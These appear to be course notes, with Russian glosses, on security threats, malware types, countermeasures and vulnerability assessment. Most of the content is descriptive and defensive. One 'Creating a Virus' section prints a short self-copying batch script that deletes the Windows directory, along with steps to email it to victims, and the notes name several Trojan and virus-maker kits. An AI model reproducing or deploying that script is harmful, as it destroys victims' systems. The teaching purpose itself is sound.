Information Security Threats and Vulnerability (PDF)

Summary

This document defines information security threats and vulnerabilities, including malware and various types of cyber threats. It also explains techniques used to spread malware, such as social engineering and compromised websites.

Full Transcript

Define Threat and Threat Sources
================================

What is a Threat?
-----------------

A **threat** is the potential occurrence of an undesirable event that
could cause [damage].

Attackers use cyber threats to [infiltrate] (проникновения)
and [steal information].

Threat Sources
--------------

**Natural**: fires, floods, power failures

**Unintentional** (Непреднамеренное): unskilled administrators,
accidents, lazy or untrained employees

Intentional:

- **Internal**: fired employee, disgruntled (недовольный) employee,
service provider, contractors

- **External**: hackers, criminals, terrorist, foreign intelligence
agent, corporate raiders

Define Malware and its Types
============================

Introduction to Malware
-----------------------

**Malware** -- malicious software, disables computer systems and gives
control of the systems to an attacker for theft or fraud.

Malware for:

- [Browser] attack, tracking of visited sites

- System [slowdown], performance degradation

- [Hardware failure] -\> computer inoperable

- Personal information [theft]

Different Ways for Malware to Enter a System
--------------------------------------------

- Messengers

- Portable hardware media/removable devices

- Browser and email software bugs

- Untrusted sites, freeware apps/software

- Downloading files from internet

- Email attachment

- Installation by other malware

- Bluetooth and wireless network

Common Techniques Attackers Use to Distribute Malware on the Web
----------------------------------------------------------------

**Black hat Search EngineOptimization (SEO)**: Ranking [malware pages
highly] in search results

**Social Engineered Click-jacking**: Tricking users into [clicking on
innocent-looking] webpages

**Spear-phishing Sites**: [Mimicking legitimate
institutions] in an attempt to steal login credentials

**Malvertising**: Embedding malware in [ad-networks]

**Compromised Legitimate Websites**: Hosting embedded malware that
spreads to [unsuspecting visitors]

**Drive-by Downloads**: Exploiting flaws (недостатки) in browser
software to install malware just [by visiting a web page]

**Spam Emails**: Attaching the malware to emails and tricking victims to
[click the attachment]

Components of Malware
---------------------

The components depend on the author\'s requirements.

- **Crypter** -- software, protects malware from reverse engineering
or analysis

- **Downloader** -- Trojan, downloads other malware from the internet
to PC

- **Dropper** -- Trojan, installs other malware on the system

- **Exploit** -- malicious code, breaks system security by exploiting
software vulnerabilities

- **Injector** -- program, injects its code into vulnerable running
processes and changes the way they execute to hide or prevent its
removal

- **Obfuscator** -- program, hides its code and intended purpose

- **Packer** -- program, allows all files to be merged into one
executable file via compression

- **Payload** -- part of the software, manages the computer system
after it has been exploited

- **Malicious** **Code** -- command, defines the basic functionalities
of malware

Types of Malware
----------------

- Trojans

- Viruses

- Ransomware

- Computer Worms

- Rootkits

- PUAs or Grayware

- Spyware

- Keylogger

- Botnets

- Fileless Malware

What is a Trojan?
-----------------

**Trojan** -- program with malicious code inside an apparently harmless
program or data.

Activated when a user performs certain actions.

Create a hidden communication channel between the victim\'s computer and
the attacker to transfer sensitive data.

*Indications of Trojan Attack:*

- The [screen flashes], flips or inverts

- The background or wallpaper setting changes automatically

- Web pages open suddenly

- OS colour settings change automatically

- Antivirus automatically disables

- Strange messages [pop up]

*How Hackers Use Trojans:*

- Delete or replace [OS files]

- [Record] screenshots, audio or video from the victim\'s
PC

- Spam and blast (врыв) email messages

- Download spyware, adware and malware files

- Disable firewalls and antivirus

- Create backdoors

- Steal personal information

- [Encrypt data] and block access to machine

*Types of Trojans:*

Trojans are categories according to their functioning and targets:

- - Remote Access Trojans

- Backdoor Trojans

- Botnet Trojans

- Rootkit Trojans

- E-Banking Trojans

- Point-of-Sale Trojans

- Defacement Trojans

- Service Protocol Trojans

- Mobile Trojans

- IoT Trojans

- Security Software Disabler Trojans

- Destructive Trojans

- DDoS Attack Trojans

- Command Shell Trojans

*Creating a Trojan:*

**Trojan Horse construction kits** help attackers to [construct Trojan
horses] of their choice

Trojan Horse Construction Kits:

- DarkHorse Trojan Virus Maker

- Trojan Horse Construction Kit

- Senna Spy Trojan Generator

- Batch Trojan Generator

- Umbra Loader - Botnet Trojan Maker

**Theef RAT Trojan** -- Remote Access Trojan written in Delphi.

What is a Virus?
----------------

**Virus** -- [self-replicating program] that produces its
own copy by attaching itself to another program, computer boot sector or
document.

Characteristics:

- Infect other programs

- Transform themselves

- Encrypt themselves

- Alter data

- Corrupt files and programs

- Self-replicate

*Purpose of Creating Viruses:*

- Damage to competitors

- Financial benefits

- Vandalize intellectual property

- Prank/research

- Cyberterrorism

- Spread political messages

- Damage networks and computers

- Remote access

*Indications of Virus Attack:*

- Processes require more resources and time

- Computer beeps with no display

- OS does not load

- Constant antivirus alerts

- Computer freezes frequently, BSOD error

- Files and folders missing

- Suspicious activity on the hard drive

- Browser window \"freezes\"

*Stages of Virus Lifecycle*

1. Design: develops the virus

2. Replication: replicates on the target system, then spreads itself

3. Launch: activated when the user performs the specified actions

4. Detection: identified as a threat

5. Incorporation: antivirus developers develop defences

6. Execution of the damage routine: sers update the antivirus and
eliminate threats

*How does a Computer Get Infected by Viruses?*

- accepts and downloads files without source checking

- opening infected email attachments

- pirated software

- do not update plugins

- not running the latest version of antivirus

- clicking on malicious ads

- portable media

- connection to an unreliable network

*Types of Viruses:*

Viruses are categories according to their [functioning] and
[targets].

- - System or Boot Sector Virus

- File and Multipartite Virus

- Macro and Cluster Virus

- Stealth/Tunneling Virus

- Encryption Virus

- Sparse Infector Virus

- Polymorphic Virus

- Metamorphic Virus

- Overwriting File or Cavity Virus

- Companion/Camouflage Virus

- Shell and File Extension Virus

- FAT and Logic Bomb Virus

- Web Scripting Virus

- Email and Armored Virus

- Add-on and Intrusive Virus

- Direct Action or Transient Virus

- Terminate & Stay Resident Virus

*Creating a Virus:*

Two different ways:

- Writing a Virus Program:

1. Create a batch file Game.bat with this text

@ echo off\
for %%f in (\*.bat) do\
copy %%f + Game.bat\
del c:\\Windows\\\*.\*

2. Covert to Game.com via bat2com utility

3. Send as an email attachment

4. When run, it copies itself and deletes all files in Windows
directory

- Using Virus Maker Tools:

- DELmE's Batch Virus Maker

- Bhavesh Virus Maker SKW

- Deadly Virus Maker

- SonicBat Batch Virus Maker

- TeraBIT Virus Maker

- Andreinick05\'s Batch Virus Maker**\
**

Ransomware
----------

**Ransomware** -- [restricts access] to files and folders.

Requires payment of a [ransom] to remove restrictions.

Computer Worms
--------------

**Worms** -- malicious programs, [independently replicated],
[executed] and [spread] across network
connections.

Consume (потребляет) available computing resources without human
interaction

Used to install [backdoors].

*How is a Worm Different from a Virus?*

Worm can replicate and use memory, but [cannot attach itself to other
programs].

A worm uses the file or information transfer capabilities of systems and
automatically [spreads through an infected network], while a
virus does not.

*Worm Makers:*

**Internet Worm Maker Thing** -- open-source tool to create worms that
can infect discs, files, show messages, disable antivirus.

Rootkits
--------

**Rootkits** -- programs that [hide their presence] and
malicious actions of the attacker, granting full access to the server or
hosting.

Replace certain operating system calls and utilities with their own
[modified versions].

Comprises (включает в себя) backdoor programs, DDoS programs, packet
sniffers, log-wiping utilities, IRC robots and etc.

The attacker places a rootkit by:

- Scanning for [vulnerable] computers and servers

- [Wrapping] (упаковывая) it in a special package

- Installing on public or corporate computers through [social
engineering]

- Launching a zero-day attack

Objectives of a rootkit:

- Gain remote backdoor access

- [Mask] attacker tracks and presence of malicious

- Gather sensitive data, network traffic

- Store other malicious programs

Potentially Unwanted Application or Applications (PUAs)
-------------------------------------------------------

Also known as **grayware** or junkware -- applications that may pose a
[risk] to data security and privacy.

Installed when [downloading freeware] or accepting a
misleading (обманчивый) licence agreement.

Covertly (скрытно) [monitor] and [alter data] or
settings.

Types:

- Adware

- Torrent

- Marketing

- Cryptomining

- Dialers

Adware
------

**Adware** -- software or program that generates [unwanted ads and
pop-ups].

Tracks cookies and user browsing patterns.

[Wastes CPU] and memory resources.

Indications of Adware:

- Frequent system lag

- Inundated (затопленный) advertisements

- Incessant (непрекращающийся) system crash

- Disparity (несоответствие) in the default browser homepage

- Presence of new toolbar or browser add-ons

- Slow Internet

Spyware
-------

**Spyware** -- stealthy program that [records the user\'s
interactions] with computer and Internet.

Hides its process, files, etc.

Spyware Propagation (распространение):

- Drive-by download

- Masquerading as anti-spyware

- Cookies

- Browser add-ons

- Piggybacked software installation

- Web browser vulnerability exploits

What Does the Spyware Do?

- Steals personal information

- Monitors users\' online activity

- Displays pop-ups

- Redirects to advertising sites

- Changes default browser settings

- Changes firewall settings

Keylogger
---------

Programs or hardwares that track keystrokes when user typing.

*What a Keylogger can Do?*

- Record every keystroke

- Capture screenshots

- Track user activity

- Monitor users\' online activity

- Record usernames, bank details, passwords

- Record online chat conversations

Botnets
-------

**Botnets** are a collection of [compromised computers]
connected to the Internet.

**Bot** program or an infected system performs repetitive work or acts
as an agent or as a UI to control other programs.

*Why Attackers use Botnets?*

- DDoS attacks

- Use a sniffer to steal information from one botnet and use it
against another

- Keylogging to log in to an account for services

- Spreading new bots

- Perpetrate (совершать) "click fraud" (мошенничество)

- Identity theft

Fileless Malware
----------------

**Fileless malware** (*non-malware*) infects [legitimate
software], [applications], and other protocols.

It is stored in [RAM] (оперативная память).

Injects malicious code into running processes (Microsoft Word, Flash,
Adobe PDF Reader, etc.).

*Reasons for Using Fileless Malware in Cyber Attacks:*

- [Stealthy in nature]: Exploits legitimate system tools

- [Living-offthe-land]: Exploits default system tools

- [Trustworthy]: Uses tools that are frequently used and
trusted

*Fileless Propagation Techniques*:

- Phishing emails

- Infection through lateral (боковом) movement

- Registry manipulation

- Legitimate applications

- Memory code injection

- Native applications

- Malicious websites

- Script-based Injection

Trojan Countermeasures
----------------------

- Do not open email attachments from [unknown senders]

- Block [unnecessary ports] on the host and firewall

- Do not accept [programs transferred] by from messengers

- Strengthen the default [configuration settings]

- Disable [unused functionality]

Virus and Worm Countermeasures
------------------------------

- Install an [antivirus] and update it

- [Regular scan] for all drives (диск)

- When [downloading files] from the Internet, pay
attention to the instructions

- Do not open [attachments] from an unknown sender

- Make regular [data backups]

Rootkit Countermeasures
-----------------------

- [Reinstall the OS/application] from a trusted source
after backup

- [Well-documented automated] installation procedures

- Protect your [workstation] or [server] from
attack

- Install [firewalls]

- Avoid logging into an account with [administrator
rights]

Spyware Countermeasures
-----------------------

- Avoid using computer networks that are not completely [under your
control]

- [Browser security settings] at a high level for the
Internet zone

- Be careful with [suspicious emails] and websites

- Check the [Task manager report] and MS configuration
manager report

- Install [antispyware] software

PUAs/ Adware Countermeasures
----------------------------

- To download the software, use [trusted websites]

- Read the [license agreement] before installation

- Avoid setting up using the [express method] or the
recommended method

- Install [antivirus], [anti-adware] software

- Vigilance (Бдительность) towards [social engineering]

Keylogger Countermeasures
-------------------------

- *Pop-up blockers*, avoid opening unwanted *emails*

- *Antispyware/antivirus* programs

- *Firewall* and protection against keylogging

- Software for *interference* (вмешательство) when pressing keys
(randomized characters)

- *On-screen keyboard* for password

Fileless Malware Countermeasures
--------------------------------

- Remove administrative tools, restrict access using [Windows Group
Policy] and Windows AppLocker

- Disable [PowerShell] and WMI when not in use

- Disable [PDF readers]

- Perform periodic [AV scan]

- Disable [Flash]

Define Vulnerabilities
======================

What is Vulnerability?
----------------------

Existence of **weakness** in an asset that can be exploited by threat
agents.

*Common Reasons behind the Existence of Vulnerability*:

- Hardware or software misconfiguration

- Insecure or poor network or application design

- Technology weaknesses

- Careless approach of end users

*Vulnerability Classification:*

- Misconfiguration

- Default Installations

- Buffer Overflows

- Unpatched Servers

- Design Flaws (Недостатки)

- Operating System Flaws

- Application Flaws

- Open Services

- Default Passwords

- Zero-day/Legacy Platform vulnerabilities

*Impact of Vulnerabilities:*

- Information disclosure

- Unauthorized access

- Identity theft

- Financial loss

- Legal consequences

- Reputational damage

- Data modification

Examples of Network Security Vulnerabilities
--------------------------------------------

***Technological Vulnerabilities**:*

- *TCP/IP Protocol*: HTTP, FTP, ICMP, SNMP, SMTP are insecure.

- *Operating System*: Vulnerable due to inherent (внутренняя)
insecurity or missing updates.

- *Network Devices*: Routers, firewalls, switches can be at risk from
weak passwords, no authentication, insecure routing, and firewall
flaws.

**Configuration Vulnerabilities**:

- *User account vulnerabilities*: Insecure transfer of user account
data

- *System account vulnerabilities*: Weak password

- *Internet service misconfiguration*

- *Default password and settings*

- *Network device misconfiguration*

**Security Policy Vulnerabilities:**

- Unwritten Policy: Difficult to implement

- Lack of Continuity

- Politics: Challenges for implementing a consistent security policy

- Lack of awareness

Define Vulnerability Assessment
===============================

Vulnerability Research
----------------------

The process of analyzing protocols, services, and configurations to
identify vulnerabilities and design flaws.

Vulnerabilities are classified depending on the severity level (low,
medium, high) and the exploit range (local, remote).

*An administrator needs vulnerability research to:*

- Gather information about [security trends, threats, attack
surfaces] and so on.

- Discover [weaknesses] in the OS and applications.

- Gather info to [prevent of security issues].

- Know [how to recover] from an attack

What is Vulnerability Assessment?
---------------------------------

[Examination of the ability of a system or application] to
withstand (противостоять) exploitation.

Recognizes, measures, and classifies security vulnerabilities in a
[computer system], [network], and [communication
channels].

Used for:

- Identify weaknesses

- Predict the effectiveness of additional security measures

Vulnerability Scanning
----------------------

*Obtained Info:*

- OS version

- Open ports

- Apps and services vulnerabilities

- Apps and services configuration errors

- Accounts with weak passwords

- Missing patches and hotfix

*Approaches:*

**Active** Scanning -- [interact] directly

**Passive** Scanning -- [without] directly interacting

Vulnerability Scoring Systems and Databases
-------------------------------------------

**Common Vulnerability Scoring System (CVSS)**: an open framework for
[communicating] (передача информации) the
[characteristics] and [impacts] of
vulnerabilities. Allows to view the vulnerability [characteristics used
to generate the scores].

**Common Vulnerabilities and Exposures (CVE)**: list or dictionary of
standardized identifiers of common vulnerabilities.

**National Vulnerability Database (NVD)**:

- U.S. government repository for vulnerability management data using
Security Content Automation Protocol (SCAP).

- Automates vulnerability management, security measurement, and
compliance (соблюдение требований).

- Includes databases on security checklists, software flaws,
misconfigurations, and impact metrics.

**Common Weakness Enumeration (CWE)**:

A system for categorizing software vulnerabilities and weaknesses.

Contains over [600 weakness categories] for identification
and mitigation (смягчение последствий).

Types of Vulnerability Assessment
---------------------------------

**Active**: Scans networks for hosts, services, and vulnerabilities.

**Host-based**: Checks system configurations for potential compromises.

**External**: Identifies vulnerabilities accessible from outside the
network.

**Application**: Tests web infrastructure for misconfigurations and
vulnerabilities.

**Passive**: Used to sniff the network traffic.

**Internal**: Scans the internal infrastructure.

**Network-based**: Determines possible network security attacks.

**Database**: Testing databased for the presence of data exposure
(раскрытие) or injection.

**Wireless Network**.

**Distributed**: Assesses the distributed organization assets (client
and server apps)

**Credential**: Assesses (оценивает) the network by obtaining the
credentials (учетные данные) of all machines present in the network.

**Non-Credential**: Without any credentials.

**Manual**.

**Automated**: Use various vulnerability assessment tools (Nessus,
Qualys, etc.)

Vulnerability-Management Life Cycle
-----------------------------------

- Identify Assets and Create a Baseline

- Vulnerability Scan

- Risk Assessment

- Remediation

- Verification

- Monitor

Vulnerability Assessment Tools
------------------------------

**Qualys Vulnerability Management**: Cloud-based service providing
visibility into IT vulnerabilities and helping protect against threats.

**OpenVAS**: A powerful framework for vulnerability scanning and
management.

**GFI LanGuard**: Scans, detects, and fixes security vulnerabilities in
networks and devices.

Vulnerability Exploitation
--------------------------

The steps involved are as follows:

- Identify the vulnerability

- Assess risks

- Determine capabilities

- Develop exploits

- Selecting delivery methods (local/remote)

- Generate and deliver the payload

- Gain remote access